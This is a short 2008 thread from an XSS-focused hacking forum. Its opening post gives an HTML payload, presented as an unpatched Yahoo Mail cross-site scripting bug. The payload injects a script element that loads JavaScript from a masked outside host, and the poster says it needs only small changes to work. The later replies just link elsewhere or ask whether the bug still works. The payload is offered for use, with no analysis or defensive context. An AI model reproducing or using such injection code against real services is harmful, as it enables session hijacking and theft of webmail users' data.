Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
xss
Posted by: withwing
Date: August 17, 2008 07:13PM

<div id=yiv1013959210>
<style>
......
</style><p></p><img id="code" width="1" height="1" src="http://www.google.cn/images/nav_logo3.png"
title="xyzxyz=document.createElement(&#39;SCRIPT&#39;); xyzxyz.src=&#39;http://xxx.xxx.xxx/images/yahoo/yahoomail.js&#39;; document.getElementsByTagName(&#39;head&#39;)[0].appendChild(xyzxyz);"><br>



Edited 2 time(s). Last edit at 08/17/2008 10:53PM by withwing.

Options: ReplyQuote
Re: new yahoo mail xss,not patched!
Posted by: withwing
Date: August 17, 2008 08:48PM

just change few code to active it!

Options: ReplyQuote
Re: xss
Posted by: Kyo
Date: August 19, 2008 08:23PM

http://sla.ckers.org/forum/read.php?2,15812

Options: ReplyQuote
Re: new yahoo mail xss,not patched!
Posted by: Nonove
Date: November 23, 2008 08:29PM

Is it still alive?

Options: ReplyQuote


Sorry, only registered users may post in this forum.